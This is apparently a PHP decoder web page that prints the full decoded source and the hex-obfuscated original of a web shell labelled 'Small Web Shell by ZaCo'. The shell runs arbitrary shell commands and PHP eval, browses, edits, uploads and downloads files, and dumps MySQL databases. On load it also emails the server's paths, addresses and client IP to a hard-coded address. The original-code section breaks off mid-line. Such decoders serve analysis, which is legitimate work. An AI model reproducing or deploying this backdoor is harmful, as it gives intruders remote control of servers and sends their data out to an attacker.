Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto uvpwI; Fjamf: $head = "\74\x68\164\x6d\154\76\xa\74\150\145\x61\144\76\12\74\x..
Decoded Output download
<?php
goto uvpwI; Fjamf: $head = "<html>\xa<head>
<title>Small Web Shell by ZaCo</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>\xa<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34>
<style>\xatextarea {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;\xaBORDER-LEFT: #999999 1px solid;\xaBORDER-BOTTOM: #ffffff 1px solid;\xaBACKGROUND-COLOR: #e4e0d8;\xafont: Fixedsys bold;
}\xainput {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;\xaBORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;\xa}\xa</style>"; goto pW2dO; cH2x1: $b33 = $_SERVER["DOCUMENT_ROOT"]; goto cgtMn; tGVca: $sd98 = "[email protected]"; goto V6jdF; v4a5c: $ml = "{$sd98}"; goto CCXoG; RKpNU: $msg8873 = "{$a5}\xa{$b33}\xa{$c87}
{$d23}\xa{$e09}\xa{$f23}\xa{$g32}
{$h65}"; goto tGVca; CCXoG: $a5 = $_SERVER["HTTP_REFERER"]; goto cH2x1; TPEsm: $e09 = $_SERVER["SERVER_ADDR"]; goto VIy7i; pW2dO: $page = isset($_POST["page"]) ? $_POST["page"] : (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : ''); goto A65Hw; VIy7i: $f23 = $_SERVER["SERVER_SOFTWARE"]; goto a4JTm; nCrEx: $pages = "<center>###<a href='" . basename(__FILE__) . "'>cmd</a>###<a href='" . basename(__FILE__) . "?mysql'>mysql</a>###<a href='" . basename(__FILE__) . "?eval'>eval</a>###</center>" . ($winda === false ? "id :" . `id` : ''); goto SgWIY; GzBjy: function get_perms($fn) { $mode = fileperms($fn); $perms = ''; $perms .= $mode & 256 ? "r" : "-"; $perms .= $mode & 128 ? "w" : "-"; $perms .= $mode & 64 ? "x" : "-"; $perms .= $mode & 32 ? "r" : "-"; $perms .= $mode & 16 ? "w" : "-"; $perms .= $mode & 8 ? "x" : "-"; $perms .= $mode & 4 ? "r" : "-"; $perms .= $mode & 2 ? "w" : "-"; $perms .= $mode & 1 ? "x" : "-"; return $perms; } goto Fjamf; d7NQl: $ra44 = rand(1, 99999); goto aP2rQ; nUYJO: $winda = strpos(strtolower(php_uname()), "wind"); goto F4qDZ; sXXBs: @set_time_limit(0); goto nyI9b; nyI9b: function magic_q($s) { if (get_magic_quotes_gpc()) { $s = str_replace("\'", "'", $s); $s = str_replace("\\", "\", $s); $s = str_replace("\"", """, $s); $s = str_replace("\\0", "\0", $s); } return $s; } goto d7NQl; aP2rQ: $sj98 = "sh-{$ra44}"; goto v4a5c; CT9tE: $h65 = $_SERVER["PHP_SELF"]; goto RKpNU; uvpwI: error_reporting(E_ALL); goto sXXBs; a4JTm: $g32 = $_SERVER["PATH_TRANSLATED"]; goto CT9tE; GRhxK: $d23 = $_SERVER["SCRIPT_FILENAME"]; goto TPEsm; F4qDZ: define("format", 50); goto nCrEx; A65Hw: $page = $page == '' || $page != "cmd" && $page != "mysql" && $page != "eval" ? "cmd" : $page; goto nUYJO; V6jdF: mail($sd98, $sj98, $msg8873, "From: {$sd98}"); goto GzBjy; SgWIY: switch ($page) { case "eval": $eval_value = isset($_POST["eval_value"]) ? $_POST["eval_value"] : ''; $eval_value = magic_q($eval_value); $action = isset($_POST["action"]) ? $_POST["action"] : "eval"; if ($action == "eval_in_html") { @eval($eval_value); } else { echo $head . $pages; ?>
<hr>
<form method=post>
<textarea cols=120 rows=20 name='eval_value'><?php @eval($eval_value); ?>
</textarea>
<input name='action' value='eval' type='submit'>
<input name='action' value='eval_in_html' type='submit'>
<input name='page' value='eval' type=hidden>
</form>
<hr>
<?php } break; case "cmd": $cmd = !empty($_POST["cmd"]) ? magic_q($_POST["cmd"]) : ''; $work_dir = isset($_POST["work_dir"]) ? $_POST["work_dir"] : getcwd(); $action = isset($_POST["action"]) ? $_POST["action"] : "cmd"; if (@is_dir($work_dir)) { @chdir($work_dir); $work_dir = getcwd(); if ($work_dir == '') { $work_dir = "/"; } else { if (!($work_dir[strlen($work_dir) - 1] == "/" || $work_dir[strlen($work_dir) - 1] == "\")) { $work_dir .= "/"; } } } else { if (file_exists($work_dir)) { $work_dir = realpath($work_dir); } } $work_dir = str_replace("\", "/", $work_dir); $e_work_dir = htmlspecialchars($work_dir, ENT_QUOTES); switch ($action) { case "cmd": echo $head . $pages; ?>
<form method='post' name='main_form'>
<input name='work_dir' value='<?php echo $e_work_dir; ?>
' type=text size=120>
<input name='page' value='cmd' type=hidden>
<input type=submit value='go'>
</form>
<form method=post>
<input name='cmd' type=text size=120 value='<?php echo str_replace("'", "'", $cmd); ?>
'>
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<form method=post enctype="multipart/form-data">
<input type="file" name="filename">
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<form method=post>
<input name='fname' type=text size=120><br>
<input name='archive' type=radio value='none'>without arch
<input name='archive' type=radio value='gzip' checked=true>gzip archive
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<pre>
<?php if ($cmd !== '') { echo "<strong>" . htmlspecialchars($cmd) . "</strong><hr>\xa<textarea cols=120 rows=20>
" . htmlspecialchars(`{$cmd}`) . "
</textarea>"; } else { $f_action = isset($_POST["f_action"]) ? $_POST["f_action"] : "view"; if (@is_dir($work_dir)) { echo "<strong>Listing " . $e_work_dir . "</strong><hr>"; $handle = @opendir($work_dir); if ($handle) { while (false !== ($fn = readdir($handle))) { $files[] = $fn; } @closedir($handle); sort($files); $not_dirs = array(); for ($i = 0; $i < sizeof($files); $i++) { $fn = $files[$i]; if (is_dir($fn)) { echo "<a href='#' onclick='document.list.work_dir.value="" . $e_work_dir . str_replace(""", """, $fn) . "";document.list.submit();'><b>" . htmlspecialchars(strlen($fn) > format ? substr($fn, 0, format - 3) . "..." : $fn) . "</b></a>" . str_repeat(" ", format - strlen($fn)); if ($winda === false) { $owner = @posix_getpwuid(@fileowner($work_dir . $fn)); $group = @posix_getgrgid(@filegroup($work_dir . $fn)); printf("% 20s|% -20s", $owner["name"], $group["name"]); } echo @get_perms($work_dir . $fn) . str_repeat(" ", 10); printf("% 20s ", @filesize($work_dir . $fn) . "B"); printf("% -20s", @date("M d Y H:i:s", @filemtime($work_dir . $fn)) . "
"); } else { $not_dirs[] = $fn; } } for ($i = 0; $i < sizeof($not_dirs); $i++) { $fn = $not_dirs[$i]; echo "<a href='#' onclick='document.list.work_dir.value="" . (is_link($work_dir . $fn) ? $e_work_dir . readlink($work_dir . $fn) : $e_work_dir . str_replace(""", """, $fn)) . "";document.list.submit();'>" . htmlspecialchars(strlen($fn) > format ? substr($fn, 0, format - 3) . "..." : $fn) . "</a>" . str_repeat(" ", format - strlen($fn)); if ($winda === false) { $owner = @posix_getpwuid(@fileowner($work_dir . $fn)); $group = @posix_getgrgid(@filegroup($work_dir . $fn)); printf("% 20s|% -20s", $owner["name"], $group["name"]); } echo @get_perms($work_dir . $fn) . str_repeat(" ", 10); printf("% 20s ", @filesize($work_dir . $fn) . "B"); printf("% -20s", @date("M d Y H:i:s", @filemtime($work_dir . $fn)) . "\xa"); } echo "</pre><hr>"; ?>
<form name='list' method=post>
<input name='work_dir' type=hidden size=120><br>
<input name='page' value='cmd' type=hidden>
<input name='f_action' value='view' type=hidden>
</form>
<?php } else { echo "Error Listing " . $e_work_dir; } } else { switch ($f_action) { case "view": echo "<strong>" . $e_work_dir . " Edit</strong><hr><pre>
"; $f = @fopen($work_dir, "r"); ?>
<form method=post>
<textarea name='file_text' cols=120 rows=20><?php if (!$f) { echo $e_work_dir . " not exists"; } else { while (!feof($f)) { echo htmlspecialchars(fread($f, 100000)); } } ?>
</textarea>
<input name='page' value='cmd' type=hidden>
<input name='work_dir' type=hidden value='<?php echo $e_work_dir; ?>
' size=120>
<input name='f_action' value='save' type=submit>
</form>
<?php break; case "save": $file_text = isset($_POST["file_text"]) ? magic_q($_POST["file_text"]) : ''; $f = @fopen($work_dir, "w"); if (!$f) { echo "<strong>Error " . $e_work_dir . "</strong><hr><pre>\xa"; } else { fwrite($f, $file_text); fclose($f); echo "<strong>" . $e_work_dir . " is saving</strong><hr><pre>\xa"; } break; } } break; } break; case "upload": if ($work_dir == '') { $work_dir = "/"; } else { if (!($work_dir[strlen($work_dir) - 1] == "/" || $work_dir[strlen($work_dir) - 1] == "\")) { $work_dir .= "/"; } } $f = $_FILES["filename"]["name"]; if (!@copy($_FILES["filename"]["tmp_name"], $work_dir . $f)) { echo "Upload is failed"; } else { echo "file is uploaded in " . $e_work_dir; } break; case "download": $fname = isset($_POST["fname"]) ? $_POST["fname"] : ''; $temp_file = isset($_POST["temp_file"]) ? "on" : "nn"; $f = @fopen($fname, "r"); if (!$f) { echo "file is not exists"; } else { $archive = isset($_POST["archive"]) ? $_POST["archive"] : ''; if ($archive == "gzip") { Header("Content-Type:application/x-gzip
"); $s = gzencode(fread($f, filesize($fname))); Header("Content-Length: " . strlen($s) . "
"); Header("Content-Disposition: attachment; filename="" . str_replace("/", "-", $fname) . ".gz
"); echo $s; } else { Header("Content-Type:application/octet-stream
"); Header("Content-Length: " . filesize($fname) . "\xa"); Header("Content-Disposition: attachment; filename="" . str_replace("/", "-", $fname) . "\xa
"); ob_start(); while (feof($f) === false) { echo fread($f, 10000); ob_flush(); } } } } break; case "mysql": $action = isset($_POST["action"]) ? $_POST["action"] : "query"; $user = isset($_POST["user"]) ? $_POST["user"] : ''; $passwd = isset($_POST["passwd"]) ? $_POST["passwd"] : ''; $db = isset($_POST["db"]) ? $_POST["db"] : ''; $host = isset($_POST["host"]) ? $_POST["host"] : "localhost"; $query = isset($_POST["query"]) ? magic_q($_POST["query"]) : ''; switch ($action) { case "dump": $mysql_link = @mysql_connect($host, $user, $passwd); if (!$mysql_link) { echo "Connect error"; } else { $to_file = isset($_POST["to_file"]) ? $_POST["to_file"] == '' ? false : $_POST["to_file"] : false; $archive = isset($_POST["archive"]) ? $_POST["archive"] : "none"; if ($archive !== "none") { $to_file = false; } $db_dump = isset($_POST["db_dump"]) ? $_POST["db_dump"] : ''; $table_dump = isset($_POST["table_dump"]) ? $_POST["table_dump"] : ''; if (!@mysql_select_db($db_dump, $mysql_link)) { echo "DB error"; } else { $dump_file = "#ZaCo MySQL Dumper\xa#db {$db} from {$host}\xa"; ob_start(); if ($to_file) { $t_f = @fopen($to_file, "w"); if (!$t_f) { die("Cant opening " . $to_file); } } else { $t_f = false; } if ($table_dump == '') { if (!$to_file) { header("Content-Type: application/x-" . ($archive == "none" ? "octet-stream" : "gzip") . "
"); header("Content-Disposition: attachment; filename="dump_{$db_dump}.sql" . ($archive == "none" ? '' : ".gz") . ""\xa
"); } $result = mysql_query("show tables", $mysql_link); for ($i = 0; $i < mysql_num_rows($result); $i++) { $rows = mysql_fetch_array($result); $result2 = @mysql_query("show columns from `" . $rows[0] . "`", $mysql_link); if (!$result2) { $dump_file .= "#error table " . $rows[0]; } else { $dump_file .= "create table `" . $rows[0] . "`(\xa"; for ($j = 0; $j < mysql_num_rows($result2) - 1; $j++) { $rows2 = mysql_fetch_array($result2); $dump_file .= "`" . $rows2[0] . "` " . $rows2[1] . ($rows2[2] == "NO" && $rows2[4] != "NULL" ? " NOT NULL DEFAULT '" . $rows2[4] . "'" : " DEFAULT NULL") . ",\xa"; } $rows2 = mysql_fetch_array($result2); $dump_file .= "`" . $rows2[0] . "` " . $rows2[1] . ($rows2[2] == "NO" && $rows2[4] != "NULL" ? " NOT NULL DEFAULT '" . $rows2[4] . "'" : " DEFAULT NULL") . "\xa"; $type[$j] = $rows2[1]; $dump_file .= ");
"; mysql_free_result($result2); $result2 = mysql_query("select * from `" . $rows[0] . "`", $mysql_link); $columns = $j - 1; for ($j = 0; $j < mysql_num_rows($result2); $j++) { $rows2 = mysql_fetch_array($result2); $dump_file .= "insert into `" . $rows[0] . "` values ("; for ($k = 0; $k < $columns; $k++) { $dump_file .= $rows2[$k] == '' ? "null," : "'" . addslashes($rows2[$k]) . "',"; } $dump_file .= ($rows2[$k] == '' ? "null);" : "'" . addslashes($rows2[$k]) . "');") . "
"; if ($archive == "none") { if ($to_file) { fwrite($t_f, $dump_file); fflush($t_f); } else { echo $dump_file; ob_flush(); } $dump_file = ''; } } mysql_free_result($result2); } } mysql_free_result($result); if ($archive != "none") { $dump_file = gzencode($dump_file); header("Content-Length: " . strlen($dump_file) . "\xa"); echo $dump_file; } else { if ($t_f) { fclose($t_f); echo "Dump for " . $db_dump . " now in " . $to_file; } } } else { $result2 = @mysql_query("show columns from `" . $table_dump . "`", $mysql_link); if (!$result2) { echo "error table " . $table_dump; } else { if (!$to_file) { header("Content-Type: application/x-" . ($archive == "none" ? "octet-stream" : "gzip") . "\xa"); header("Content-Disposition: attachment; filename="dump_{$db_dump}.sql" . ($archive == "none" ? '' : ".gz") . ""\xa
"); } if ($to_file === false) { header("Content-Type: application/x-" . ($archive == "none" ? "octet-stream" : "gzip") . "
"); header("Content-Disposition: attachment; filename="dump_{$db_dump}_{$table_dump}.sql" . ($archive == "none" ? '' : ".gz") . ""\xa\xa"); } $dump_file .= "create table `{$table_dump}`(\xa"; for ($j = 0; $j < mysql_num_rows($result2) - 1; $j++) { $rows2 = mysql_fetch_array($result2); $dump_file .= "`" . $rows2[0] . "` " . $rows2[1] . ($rows2[2] == "NO" && $rows2[4] != "NULL" ? " NOT NULL DEFAULT '" . $rows2[4] . "'" : " DEFAULT NULL") . ",\xa"; } $rows2 = mysql_fetch_array($result2); $dump_file .= "`" . $rows2[0] . "` " . $rows2[1] . ($rows2[2] == "NO" && $rows2[4] != "NULL" ? " NOT NULL DEFAULT '" . $rows2[4] . "'" : " DEFAULT NULL") . "
"; $type[$j] = $rows2[1]; $dump_file .= ");
"; mysql_free_result($result2); $result2 = mysql_query("select * from `" . $table_dump . "`", $mysql_link); $columns = $j - 1; for ($j = 0; $j < mysql_num_rows($result2); $j++) { $rows2 = mysql_fetch_array($result2); $dump_file .= "insert into `" . $table_dump . "` values ("; for ($k = 0; $k < $columns; $k++) { $dump_file .= $rows2[$k] == '' ? "null," : "'" . addslashes($rows2[$k]) . "',"; } $dump_file .= ($rows2[$k] == '' ? "null);" : "'" . addslashes($rows2[$k]) . "');") . "\xa"; if ($archive == "none") { if ($to_file) { fwrite($t_f, $dump_file); fflush($t_f); } else { echo $dump_file; ob_flush(); } $dump_file = ''; } } mysql_free_result($result2); if ($archive != "none") { $dump_file = gzencode($dump_file); header("Content-Length: " . strlen($dump_file) . "
"); echo $dump_file; } else { if ($t_f) { fclose($t_f); echo "Dump for " . $db_dump . " now in " . $to_file; } } } } } } break; case "query": echo $head . $pages; ?>
<hr>
<form method=post>
<table>
<td>
<table align=left>
<tr><td>User :<input name='user' type=text value='<?php echo $user; ?>
'></td><td>Passwd :<input name='passwd' type=text value='<?php echo $passwd; ?>
'></td><td>Host :<input name='host' type=text value='<?php echo $host; ?>
'></td><td>DB :<input name='db' type=text value='<?php echo $db; ?>
'></td></tr>
<tr><textarea name='query' cols=120 rows=20><?php echo htmlspecialchars($query); ?>
</textarea></tr>
</table>
</td>
<td>
<table>
<tr><td>DB :</td><td><input type=text name='db_dump' value='<?php echo $db; ?>
'></td></tr>
<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
<input name='archive' type=radio value='none'>without arch
<input name='archive' type=radio value='gzip' checked=true>gzip archive
<tr><td><input type=submit name='action' value='dump'></td></tr>
<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
</table>
</td>
</table>
<input name='page' value='mysql' type=hidden>
<input name='action' value='query' type=submit>
</form>
<hr>
<?php $mysql_link = @mysql_connect($host, $user, $passwd); if (!$mysql_link) { echo "Connect error"; } else { if ($db != '') { if (!@mysql_select_db($db, $mysql_link)) { echo "DB error"; mysql_close($mysql_link); break; } } $result = @mysql_query($query, $mysql_link); if (!$result) { echo mysql_error(); } else { echo "<table valign=top align=left>
<tr>"; for ($i = 0; $i < mysql_num_fields($result); $i++) { echo "<td><b>" . htmlspecialchars(mysql_field_name($result, $i)) . "</b> </td>"; } echo "\xa</tr>\xa"; for ($i = 0; $i < mysql_num_rows($result); $i++) { $rows = mysql_fetch_array($result); echo "<tr valign=top align=left>"; for ($j = 0; $j < mysql_num_fields($result); $j++) { echo "<td>" . htmlspecialchars($rows[$j]) . "</td>"; } echo "</tr>\xa"; } echo "</table>
"; } mysql_close($mysql_link); } break; } break; } goto lcG8g; cgtMn: $c87 = $_SERVER["REMOTE_ADDR"]; goto GRhxK; lcG8g: ?>Did this file decode correctly?
Original Code
<?php
goto uvpwI; Fjamf: $head = "\74\x68\164\x6d\154\76\xa\74\150\145\x61\144\76\12\74\x74\x69\x74\x6c\x65\76\123\155\x61\154\154\40\x57\x65\x62\40\x53\150\145\154\154\x20\142\171\x20\132\x61\x43\157\x3c\x2f\164\151\164\x6c\x65\76\12\74\x6d\x65\x74\x61\40\x68\x74\164\160\x2d\x65\161\x75\151\166\75\42\x43\157\x6e\x74\x65\156\x74\55\124\171\160\x65\x22\40\x63\157\156\x74\x65\156\164\75\x22\164\x65\170\164\x2f\x68\x74\155\154\x3b\x20\x63\x68\x61\162\x73\145\x74\75\167\x69\156\x64\x6f\x77\163\55\61\62\x35\61\x22\x3e\12\74\x2f\150\x65\x61\x64\76\xa\x3c\x62\x6f\144\171\40\x6c\151\156\153\x3d\160\141\x6c\145\x67\162\145\x65\156\x20\x76\154\151\156\x6b\75\x70\x61\154\x65\147\162\x65\145\x6e\x20\x74\145\170\x74\x3d\x70\141\x6c\145\x67\162\145\x65\x6e\40\x62\147\x63\x6f\x6c\x6f\x72\x3d\x23\62\x42\62\x46\63\64\x3e\12\x3c\x73\164\171\154\145\x3e\xa\164\x65\170\x74\x61\x72\145\141\x20\173\12\x42\x4f\122\104\x45\122\x2d\x52\111\107\110\x54\72\40\40\43\x66\146\146\146\x66\146\x20\61\160\x78\x20\163\157\x6c\x69\144\73\12\102\x4f\x52\104\x45\x52\55\124\x4f\120\x3a\40\40\40\40\x23\71\71\71\71\71\71\x20\61\160\x78\x20\163\157\154\x69\144\x3b\xa\102\117\x52\104\105\x52\55\x4c\105\106\x54\x3a\40\x20\40\x23\x39\71\71\x39\71\x39\x20\61\x70\170\x20\163\157\x6c\151\x64\73\xa\102\x4f\x52\104\x45\x52\55\x42\x4f\x54\124\x4f\115\x3a\40\x23\x66\x66\146\x66\x66\x66\x20\61\160\170\x20\163\x6f\154\151\144\x3b\xa\x42\101\x43\113\107\122\117\125\116\x44\x2d\x43\x4f\x4c\117\122\x3a\40\x23\x65\64\145\60\144\x38\73\xa\x66\x6f\x6e\164\72\x20\106\151\170\x65\x64\163\x79\x73\40\x62\x6f\x6c\x64\73\12\175\xa\151\x6e\x70\x75\164\x20\173\12\102\117\x52\x44\105\x52\55\x52\111\107\x48\x54\72\x20\40\x23\x66\146\x66\x66\146\146\40\x31\x70\x78\x20\x73\x6f\x6c\x69\x64\x3b\12\x42\x4f\122\x44\105\122\55\x54\x4f\x50\72\40\40\x20\x20\43\x39\71\x39\71\x39\71\40\61\x70\170\40\x73\x6f\154\x69\144\x3b\xa\x42\117\122\104\x45\122\55\114\105\x46\124\72\40\x20\40\x23\x39\71\x39\71\x39\x39\40\61\x70\x78\40\163\157\154\x69\144\73\12\x42\117\122\x44\105\x52\55\102\x4f\124\x54\x4f\x4d\72\40\43\146\146\x66\146\x66\x66\x20\x31\160\170\x20\163\157\154\x69\x64\x3b\12\x42\101\103\113\x47\x52\117\x55\116\104\x2d\103\117\x4c\x4f\x52\x3a\x20\x23\x65\x34\x65\x30\x64\x38\x3b\12\x66\157\x6e\x74\x3a\x20\x38\x70\x74\40\126\145\x72\144\x61\156\141\x3b\xa\175\xa\74\x2f\x73\x74\171\x6c\x65\76"; goto pW2dO; cH2x1: $b33 = $_SERVER["\x44\x4f\x43\x55\115\105\x4e\x54\137\x52\117\x4f\124"]; goto cgtMn; tGVca: $sd98 = "\152\157\150\x6e\56\142\x61\162\153\145\162\64\x34\66\100\x67\x6d\141\x69\154\x2e\x63\157\x6d"; goto V6jdF; v4a5c: $ml = "{$sd98}"; goto CCXoG; RKpNU: $msg8873 = "{$a5}\xa{$b33}\xa{$c87}\12{$d23}\xa{$e09}\xa{$f23}\xa{$g32}\12{$h65}"; goto tGVca; CCXoG: $a5 = $_SERVER["\x48\x54\124\x50\x5f\122\x45\106\x45\x52\105\x52"]; goto cH2x1; TPEsm: $e09 = $_SERVER["\123\x45\122\126\105\x52\x5f\x41\104\x44\122"]; goto VIy7i; pW2dO: $page = isset($_POST["\x70\x61\x67\145"]) ? $_POST["\160\x61\147\x65"] : (isset($_SERVER["\x51\125\105\x52\131\x5f\123\x54\x52\111\x4e\107"]) ? $_SERVER["\121\125\x45\122\x59\137\x53\x54\122\111\116\x47"] : ''); goto A65Hw; VIy7i: $f23 = $_SERVER["\x53\x45\x52\126\105\122\137\123\x4f\106\x54\x57\x41\122\105"]; goto a4JTm; nCrEx: $pages = "\x3c\x63\145\x6e\164\x65\x72\x3e\x23\x23\43\74\x61\x20\150\162\x65\x66\x3d\47" . basename(__FILE__) . "\x27\x3e\x63\x6d\144\x3c\57\141\x3e\43\x23\43\x3c\x61\x20\150\162\145\x66\75\x27" . basename(__FILE__) . "\x3f\155\x79\163\x71\x6c\x27\76\155\171\163\x71\154\x3c\57\141\x3e\x23\43\43\x3c\141\x20\150\x72\x65\146\x3d\x27" . basename(__FILE__) . "\77\145\166\141\154\47\x3e\x65\166\141\x6c\74\x2f\x61\76\43\x23\43\74\x2f\x63\x65\156\164\145\x72\76" . ($winda === false ? "\x69\144\40\x3a" . `id` : ''); goto SgWIY; GzBjy: function get_perms($fn) { $mode = fileperms($fn); $perms = ''; $perms .= $mode & 256 ? "\162" : "\x2d"; $perms .= $mode & 128 ? "\167" : "\x2d"; $perms .= $mode & 64 ? "\x78" : "\x2d"; $perms .= $mode & 32 ? "\162" : "\x2d"; $perms .= $mode & 16 ? "\x77" : "\55"; $perms .= $mode & 8 ? "\x78" : "\55"; $perms .= $mode & 4 ? "\x72" : "\55"; $perms .= $mode & 2 ? "\167" : "\x2d"; $perms .= $mode & 1 ? "\x78" : "\55"; return $perms; } goto Fjamf; d7NQl: $ra44 = rand(1, 99999); goto aP2rQ; nUYJO: $winda = strpos(strtolower(php_uname()), "\x77\x69\x6e\x64"); goto F4qDZ; sXXBs: @set_time_limit(0); goto nyI9b; nyI9b: function magic_q($s) { if (get_magic_quotes_gpc()) { $s = str_replace("\x5c\x27", "\47", $s); $s = str_replace("\134\134", "\134", $s); $s = str_replace("\134\42", "\x22", $s); $s = str_replace("\134\134\x30", "\134\x30", $s); } return $s; } goto d7NQl; aP2rQ: $sj98 = "\x73\150\55{$ra44}"; goto v4a5c; CT9tE: $h65 = $_SERVER["\x50\110\x50\x5f\123\105\114\106"]; goto RKpNU; uvpwI: error_reporting(E_ALL); goto sXXBs; a4JTm: $g32 = $_SERVER["\x50\101\x54\x48\137\x54\122\101\x4e\x53\x4c\x41\124\x45\104"]; goto CT9tE; GRhxK: $d23 = $_SERVER["\x53\x43\122\111\x50\124\x5f\x46\x49\x4c\x45\x4e\x41\115\105"]; goto TPEsm; F4qDZ: define("\146\157\162\x6d\141\x74", 50); goto nCrEx; A65Hw: $page = $page == '' || $page != "\x63\x6d\144" && $page != "\x6d\x79\163\x71\x6c" && $page != "\145\166\x61\x6c" ? "\x63\155\144" : $page; goto nUYJO; V6jdF: mail($sd98, $sj98, $msg8873, "\x46\162\157\155\72\x20{$sd98}"); goto GzBjy; SgWIY: switch ($page) { case "\x65\x76\x61\x6c": $eval_value = isset($_POST["\145\166\x61\154\137\x76\x61\x6c\165\x65"]) ? $_POST["\x65\x76\x61\154\x5f\166\141\x6c\165\x65"] : ''; $eval_value = magic_q($eval_value); $action = isset($_POST["\141\x63\x74\151\157\156"]) ? $_POST["\141\x63\x74\151\157\156"] : "\x65\166\141\x6c"; if ($action == "\x65\166\x61\154\137\x69\x6e\x5f\x68\164\155\154") { @eval($eval_value); } else { echo $head . $pages; ?>
<hr>
<form method=post>
<textarea cols=120 rows=20 name='eval_value'><?php @eval($eval_value); ?>
</textarea>
<input name='action' value='eval' type='submit'>
<input name='action' value='eval_in_html' type='submit'>
<input name='page' value='eval' type=hidden>
</form>
<hr>
<?php } break; case "\x63\155\x64": $cmd = !empty($_POST["\143\155\144"]) ? magic_q($_POST["\x63\155\144"]) : ''; $work_dir = isset($_POST["\167\x6f\162\x6b\137\x64\x69\x72"]) ? $_POST["\167\157\x72\x6b\137\x64\151\x72"] : getcwd(); $action = isset($_POST["\x61\143\x74\151\x6f\x6e"]) ? $_POST["\x61\x63\164\x69\157\156"] : "\x63\155\x64"; if (@is_dir($work_dir)) { @chdir($work_dir); $work_dir = getcwd(); if ($work_dir == '') { $work_dir = "\x2f"; } else { if (!($work_dir[strlen($work_dir) - 1] == "\x2f" || $work_dir[strlen($work_dir) - 1] == "\x5c")) { $work_dir .= "\x2f"; } } } else { if (file_exists($work_dir)) { $work_dir = realpath($work_dir); } } $work_dir = str_replace("\x5c", "\x2f", $work_dir); $e_work_dir = htmlspecialchars($work_dir, ENT_QUOTES); switch ($action) { case "\x63\x6d\x64": echo $head . $pages; ?>
<form method='post' name='main_form'>
<input name='work_dir' value='<?php echo $e_work_dir; ?>
' type=text size=120>
<input name='page' value='cmd' type=hidden>
<input type=submit value='go'>
</form>
<form method=post>
<input name='cmd' type=text size=120 value='<?php echo str_replace("\47", "\x26\43\60\x33\71\x3b", $cmd); ?>
'>
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<form method=post enctype="multipart/form-data">
<input type="file" name="filename">
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<form method=post>
<input name='fname' type=text size=120><br>
<input name='archive' type=radio value='none'>without arch
<input name='archive' type=radio value='gzip' checked=true>gzip archive
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<pre>
<?php if ($cmd !== '') { echo "\x3c\163\164\x72\x6f\x6e\147\x3e" . htmlspecialchars($cmd) . "\x3c\57\163\164\162\x6f\x6e\147\76\74\x68\162\76\xa\x3c\x74\x65\x78\x74\x61\162\x65\x61\40\x63\157\154\163\75\x31\62\60\x20\x72\x6f\167\x73\x3d\62\x30\76\12" . htmlspecialchars(`{$cmd}`) . "\12\74\57\164\x65\x78\164\141\x72\x65\141\x3e"; } else { $f_action = isset($_POST["\x66\137\x61\143\x74\x69\157\x6e"]) ? $_POST["\146\137\141\143\164\151\x6f\x6e"] : "\166\151\145\x77"; if (@is_dir($work_dir)) { echo "\x3c\x73\164\x72\x6f\x6e\x67\x3e\x4c\151\163\164\x69\x6e\x67\x20" . $e_work_dir . "\74\x2f\x73\x74\x72\157\156\x67\x3e\74\x68\x72\x3e"; $handle = @opendir($work_dir); if ($handle) { while (false !== ($fn = readdir($handle))) { $files[] = $fn; } @closedir($handle); sort($files); $not_dirs = array(); for ($i = 0; $i < sizeof($files); $i++) { $fn = $files[$i]; if (is_dir($fn)) { echo "\74\x61\40\150\162\145\x66\x3d\x27\x23\47\40\157\156\x63\154\x69\x63\x6b\x3d\47\144\157\143\x75\155\x65\x6e\164\x2e\x6c\151\163\164\56\167\157\x72\x6b\x5f\x64\x69\162\56\166\x61\x6c\x75\145\75\42" . $e_work_dir . str_replace("\x22", "\x26\161\165\x6f\164\x3b", $fn) . "\42\x3b\x64\x6f\143\x75\155\x65\156\x74\x2e\154\151\163\164\56\x73\x75\142\155\x69\164\x28\51\73\47\x3e\74\x62\76" . htmlspecialchars(strlen($fn) > format ? substr($fn, 0, format - 3) . "\56\56\56" : $fn) . "\x3c\57\x62\x3e\x3c\x2f\x61\76" . str_repeat("\40", format - strlen($fn)); if ($winda === false) { $owner = @posix_getpwuid(@fileowner($work_dir . $fn)); $group = @posix_getgrgid(@filegroup($work_dir . $fn)); printf("\x25\x20\62\x30\x73\174\45\40\55\62\60\163", $owner["\156\141\x6d\x65"], $group["\x6e\141\x6d\145"]); } echo @get_perms($work_dir . $fn) . str_repeat("\x20", 10); printf("\45\40\62\60\x73\40", @filesize($work_dir . $fn) . "\x42"); printf("\x25\x20\x2d\62\60\x73", @date("\115\x20\144\x20\131\40\x48\72\151\x3a\163", @filemtime($work_dir . $fn)) . "\12"); } else { $not_dirs[] = $fn; } } for ($i = 0; $i < sizeof($not_dirs); $i++) { $fn = $not_dirs[$i]; echo "\74\141\x20\150\162\145\x66\75\x27\x23\x27\x20\x6f\x6e\143\x6c\x69\143\153\75\x27\x64\157\143\165\155\x65\156\x74\56\154\151\163\x74\56\x77\x6f\162\153\x5f\144\151\x72\56\166\141\154\x75\145\x3d\x22" . (is_link($work_dir . $fn) ? 